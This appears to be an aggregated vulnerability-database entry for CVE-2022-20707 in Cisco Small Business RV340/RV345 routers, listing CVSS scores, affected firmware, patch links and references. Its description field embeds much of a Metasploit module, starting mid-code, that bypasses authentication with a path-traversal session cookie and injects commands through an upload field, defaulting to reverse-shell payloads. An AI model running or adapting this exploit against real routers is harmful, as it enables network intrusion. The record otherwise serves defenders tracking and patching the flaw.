ID

VAR-202202-0322


CVE

CVE-2022-20707


TITLE

plural  Cisco Small Business RV  Series router out-of-bounds write vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2022-004815

DESCRIPTION

Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the www-data user. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the configuration of the NGINX web server. When parsing the sessionid cookie, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to bypass authentication on the system. This access can then be used to pivot to other parts of the network. This module works on firmware versions 1.0.03.24 and below. }, 'License' => MSF_LICENSE, 'Platform' => ['linux', 'unix'], 'Author' => [ 'Biem Pham', # Vulnerability Discoveries 'Neterum', # Metasploit Module 'jbaines-r7' # Inspired from cisco_rv_series_authbypass_and_rce.rb ], 'DisclosureDate' => '2021-11-02', 'Arch' => [ARCH_CMD, ARCH_ARMLE], 'References' => [ ['CVE', '2022-20705'], # Authentication Bypass ['CVE', '2022-20707'], # Command Injection ['ZDI', '22-410'], # Authentication Bypass ['ZDI', '22-411'] # Command Injection ], 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'Payload' => { 'BadChars' => '\'#' }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_ARMLE], 'Type' => :linux_dropper, 'Payload' => { 'BadChars' => '\'#' }, 'CmdStagerFlavor' => [ 'wget', 'curl' ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'MeterpreterTryToFork' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'Base path', '/']) ] ) end # sessionid utilized later needs to be set to length # of 16 or exploit will fail. Tested with lengths # 14-17 def generate_session_id return Rex::Text.rand_text_alphanumeric(16) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => '/upload', 'headers' => { 'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id } }, 10) # A proper "upload" will trigger file creation. So the send_request_cgi call # above is an incorrect "upload" call to avoid creating a file on disk. The router will return # status code 405 Not Allowed if authentication has been bypassed by the above request. # The firmware containing this authentication bypass also contains the command injection # vulnerability that will be abused during actual exploitation. Non-vulnerable # firmware versions will respond with 403 Forbidden. if res.nil? return CheckCode::Unknown('The device did not respond to request packet.') elsif res.code == 405 return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.') elsif res.code == 403 return CheckCode::Safe('The device is not vulnerable to exploitation.') else # Catch-all return CheckCode::Unknown('The target responded in an unexpected way. Exploitation is unlikely.') end end def execute_command(cmd, _opts = {}) res = send_exploit(cmd) # Successful unix_cmd shells should not produce a response. # However if a response is returned, check the status code and return # Failure::NotVulnerable if it is 403 Forbidden. if target['Type'] == :unix_cmd && res&.code == 403 fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable') end if target['Type'] == :linux_dropper fail_with(Failure::Unreachable, 'The target did not respond') unless res fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200 begin body_json = res.get_json_document fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json rescue JSON::ParserError => e print_error("Failed: #{e.class} - #{e.message}") fail_with(Failure::UnexpectedReply, 'Failed to parse the response returned from the server! Its possible the response may not be JSON!') end end print_good('Exploit successfully executed.') end def send_exploit(cmd) filename = Rex::Text.rand_text_alphanumeric(5..12) fileparam = Rex::Text.rand_text_alphanumeric(5..12) input = Rex::Text.rand_text_alphanumeric(5..12) # sessionid utilized later needs to be set to length # of 16 or exploit will fail. Tested with lengths # 14-17 sessionid = Rex::Text.rand_text_alphanumeric(16) filepath = '/tmp/upload.input' # This file must exist and be writeable by www-data so we just use the temporary upload file to prevent issues. pathparam = 'Configuration' destination = "'; " + cmd + ' #' multipart_form = Rex::MIME::Message.new multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"') multipart_form.add_part(filename, nil, nil, 'form-data; name="filename"') multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"') multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"') multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"') multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name="input"; filename="%<filename>s"', filename: filename)) # Escaping "/tmp/upload/" folder that does not contain any other permanent files send_request_cgi({ 'method' => 'POST', 'uri' => '/upload', 'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}", 'headers' => { 'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid }, 'data' => multipart_form.to_s }, 10) end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager(linemax: 120) end end end

Trust: 3.69

sources: NVD: CVE-2022-20707 // JVNDB: JVNDB-2022-004815 // ZDI: ZDI-22-419 // ZDI: ZDI-22-411 // ZDI: ZDI-22-409 // VULMON: CVE-2022-20707 // PACKETSTORM: 170988

AFFECTED PRODUCTS

vendor:ciscomodel:rv340scope: - version: -

Trust: 2.1

vendor:ciscomodel:rv340wscope:lteversion:1.0.03.24

Trust: 1.0

vendor:ciscomodel:rv345pscope:lteversion:1.0.03.24

Trust: 1.0

vendor:ciscomodel:rv340scope:lteversion:1.0.03.24

Trust: 1.0

vendor:ciscomodel:rv345scope:lteversion:1.0.03.24

Trust: 1.0

vendor:シスコシステムズmodel:rv345p dual wan gigabit poe vpn routerscope: - version: -

Trust: 0.8

vendor:シスコシステムズmodel:rv340 dual wan gigabit vpn routerscope: - version: -

Trust: 0.8

vendor:シスコシステムズmodel:rv340w dual wan gigabit wireless-ac vpn routerscope: - version: -

Trust: 0.8

vendor:シスコシステムズmodel:rv345 dual wan gigabit vpn routerscope: - version: -

Trust: 0.8

sources: ZDI: ZDI-22-419 // ZDI: ZDI-22-411 // ZDI: ZDI-22-409 // JVNDB: JVNDB-2022-004815 // NVD: CVE-2022-20707

CVSS

SEVERITY

CVSSV2

CVSSV3

ZDI: CVE-2022-20707
value: HIGH

Trust: 1.4

nvd@nist.gov: CVE-2022-20707
value: HIGH

Trust: 1.0

ykramarz@cisco.com: CVE-2022-20707
value: CRITICAL

Trust: 1.0

NVD: CVE-2022-20707
value: HIGH

Trust: 0.8

ZDI: CVE-2022-20707
value: MEDIUM

Trust: 0.7

CNNVD: CNNVD-202202-169
value: HIGH

Trust: 0.6

VULMON: CVE-2022-20707
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2022-20707
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

nvd@nist.gov: CVE-2022-20707
baseSeverity: HIGH
baseScore: 7.3
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: LOW
exploitabilityScore: 3.9
impactScore: 3.4
version: 3.1

Trust: 1.0

ykramarz@cisco.com: CVE-2022-20707
baseSeverity: CRITICAL
baseScore: 10.0
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: CHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 6.0
version: 3.1

Trust: 1.0

NVD: CVE-2022-20707
baseSeverity: HIGH
baseScore: 7.3
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: LOW
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

ZDI: CVE-2022-20707
baseSeverity: HIGH
baseScore: 7.8
vectorString: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
attackVector: LOCAL
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 1.8
impactScore: 5.9
version: 3.0

Trust: 0.7

ZDI: CVE-2022-20707
baseSeverity: MEDIUM
baseScore: 4.3
vectorString: AV:A/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
attackVector: ADJACENT
attackComplexity: LOW
privilegesRequired: HIGH
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: LOW
exploitabilityScore: 0.9
impactScore: 3.4
version: 3.0

Trust: 0.7

ZDI: CVE-2022-20707
baseSeverity: HIGH
baseScore: 8.8
vectorString: AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: ADJACENT
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 2.8
impactScore: 5.9
version: 3.0

Trust: 0.7

sources: ZDI: ZDI-22-419 // ZDI: ZDI-22-411 // ZDI: ZDI-22-409 // VULMON: CVE-2022-20707 // JVNDB: JVNDB-2022-004815 // CNNVD: CNNVD-202202-169 // NVD: CVE-2022-20707 // NVD: CVE-2022-20707

PROBLEMTYPE DATA

problemtype:CWE-121

Trust: 1.0

problemtype:CWE-787

Trust: 1.0

problemtype:Out-of-bounds writing (CWE-787) [NVD evaluation ]

Trust: 0.8

sources: JVNDB: JVNDB-2022-004815 // NVD: CVE-2022-20707

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202202-169

TYPE

buffer error

Trust: 0.6

sources: CNNVD: CNNVD-202202-169

PATCH

title:Cisco has issued an update to correct this vulnerability.url:https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D

Trust: 2.1

title:cisco-sa-smb-mult-vuln-KA9PK6Durl:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D

Trust: 0.8

title:Cisco Small Business Buffer error vulnerability fixurl:http://123.124.177.30/web/xxk/bdxqById.tag?id=183260

Trust: 0.6

title:Cisco: Cisco Small Business RV Series Routers Vulnerabilitiesurl:https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-smb-mult-vuln-KA9PK6D

Trust: 0.1

title:https://github.com/20142995/Gobyurl:https://github.com/20142995/Goby

Trust: 0.1

title:Goby_POC POC 数量1319url:https://github.com/Z0fhack/Goby_POC

Trust: 0.1

title:CVE-2022-XXXXurl:https://github.com/AlphabugX/CVE-2022-23305

Trust: 0.1

title:CVE-2022-XXXXurl:https://github.com/AlphabugX/CVE-2022-RCE

Trust: 0.1

sources: ZDI: ZDI-22-419 // ZDI: ZDI-22-411 // ZDI: ZDI-22-409 // VULMON: CVE-2022-20707 // JVNDB: JVNDB-2022-004815 // CNNVD: CNNVD-202202-169

EXTERNAL IDS

db:NVDid:CVE-2022-20707

Trust: 5.5

db:ZDIid:ZDI-22-419

Trust: 2.4

db:ZDIid:ZDI-22-411

Trust: 2.4

db:ZDIid:ZDI-22-409

Trust: 2.4

db:PACKETSTORMid:170988

Trust: 1.8

db:JVNDBid:JVNDB-2022-004815

Trust: 0.8

db:ZDI_CANid:ZDI-CAN-15940

Trust: 0.7

db:ZDI_CANid:ZDI-CAN-15883

Trust: 0.7

db:ZDI_CANid:ZDI-CAN-15610

Trust: 0.7

db:CS-HELPid:SB2022020301

Trust: 0.6

db:CNNVDid:CNNVD-202202-169

Trust: 0.6

db:VULMONid:CVE-2022-20707

Trust: 0.1

sources: ZDI: ZDI-22-419 // ZDI: ZDI-22-411 // ZDI: ZDI-22-409 // VULMON: CVE-2022-20707 // JVNDB: JVNDB-2022-004815 // PACKETSTORM: 170988 // CNNVD: CNNVD-202202-169 // NVD: CVE-2022-20707

REFERENCES

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d

Trust: 3.8

url:https://www.zerodayinitiative.com/advisories/zdi-22-419/

Trust: 2.4

url:http://packetstormsecurity.com/files/170988/cisco-rv-series-authentication-bypass-command-injection.html

Trust: 1.8

url:https://www.zerodayinitiative.com/advisories/zdi-22-411/

Trust: 1.7

url:https://www.zerodayinitiative.com/advisories/zdi-22-409/

Trust: 1.7

url:https://nvd.nist.gov/vuln/detail/cve-2022-20707

Trust: 1.5

url:https://www.cybersecurity-help.cz/vdb/sb2022020301

Trust: 0.6

url:https://cwe.mitre.org/data/definitions/787.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv340_lan/

Trust: 0.1

url:https://metasploit.com/download

Trust: 0.1

url:https://github.com/rapid7/metasploit-framework

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-20705

Trust: 0.1

sources: ZDI: ZDI-22-419 // ZDI: ZDI-22-411 // ZDI: ZDI-22-409 // VULMON: CVE-2022-20707 // JVNDB: JVNDB-2022-004815 // PACKETSTORM: 170988 // CNNVD: CNNVD-202202-169 // NVD: CVE-2022-20707

CREDITS

Bien Pham (@bienpnn) from Team Orca of Sea Security (security.sea.com)

Trust: 1.4

sources: ZDI: ZDI-22-411 // ZDI: ZDI-22-409

SOURCES

db:ZDIid:ZDI-22-419
db:ZDIid:ZDI-22-411
db:ZDIid:ZDI-22-409
db:VULMONid:CVE-2022-20707
db:JVNDBid:JVNDB-2022-004815
db:PACKETSTORMid:170988
db:CNNVDid:CNNVD-202202-169
db:NVDid:CVE-2022-20707

LAST UPDATE DATE

2024-08-14T13:53:35.952000+00:00


SOURCES UPDATE DATE

db:ZDIid:ZDI-22-419date:2022-02-22T00:00:00
db:ZDIid:ZDI-22-411date:2022-02-22T00:00:00
db:ZDIid:ZDI-22-409date:2022-02-22T00:00:00
db:VULMONid:CVE-2022-20707date:2023-11-07T00:00:00
db:JVNDBid:JVNDB-2022-004815date:2023-05-08T08:12:00
db:CNNVDid:CNNVD-202202-169date:2023-02-15T00:00:00
db:NVDid:CVE-2022-20707date:2023-11-07T03:42:41.160

SOURCES RELEASE DATE

db:ZDIid:ZDI-22-419date:2022-02-22T00:00:00
db:ZDIid:ZDI-22-411date:2022-02-22T00:00:00
db:ZDIid:ZDI-22-409date:2022-02-22T00:00:00
db:VULMONid:CVE-2022-20707date:2022-02-10T00:00:00
db:JVNDBid:JVNDB-2022-004815date:2023-05-08T00:00:00
db:PACKETSTORMid:170988date:2023-02-14T15:32:53
db:CNNVDid:CNNVD-202202-169date:2022-02-03T00:00:00
db:NVDid:CVE-2022-20707date:2022-02-10T18:15:09.413